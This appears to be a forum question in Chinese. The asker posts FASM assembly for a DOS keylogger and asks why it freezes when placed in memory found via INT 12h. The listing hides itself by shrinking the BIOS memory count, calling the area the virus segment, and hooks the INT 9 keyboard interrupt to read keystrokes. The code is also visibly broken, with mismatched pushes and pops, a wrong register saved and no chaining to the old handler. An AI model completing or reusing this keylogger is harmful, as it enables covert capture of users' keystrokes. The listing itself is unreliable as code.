我在Fasm中为MS-DOS创建了一个键盘记录程序,但是当我冻结计算机时,由于段:键盘记录程序使用的偏移内存有问题,我将键盘记录程序冻结了。这是我编码的来源:
cli
push es
mov ax,0
mov es,ax
es
mov bx,[24h]
es
mov dx,[26h]
es
mov [180h],cx
es
mov [182h],dx
PUSH DS
MOV BP,40H
MOV DS,BP
ds
dec word [13h] ;Memory less by 1K
POP DS
int 12h ;memory into AX
mov cl,6 ;because memory is in K
shl ax,cl
mov bp,ax ;ES is the virus segmentes
es
mov [24h],bx
es
mov [26h],bp
pop es
sti
push es
mov si,bp
mov es,si
mov si,code
mov di,0
mov cx,codesize-code
repz
movsb
pop es
push es
mov si,bp
mov es,si
mov si,keys
mov di,codesize-code+1024
mov cx,36h
repz
movsb
pop es
push es
mov ax,bp
mov es,ax
mov ax,codesize
mov bx,codesize
mov es,bp
es
mov [bx],ax
pop es
ret
code:
pushf
pushaw
sti
IN AL,60H
mov al,20h
out 20h,al
pop es
pop ds
popaw
popf
iret
keys db '',0
codesize:
buf db 1024 dup (0)
iret
如果我使用segment:offset 2000:0来存储我的Int 9处理程序,则该应用程序可以正常工作,但是,如果我使用int 12h获取内存段来放置键盘记录器,则MS-DOS会冻结。然后 我上面的消息来源有什么问题?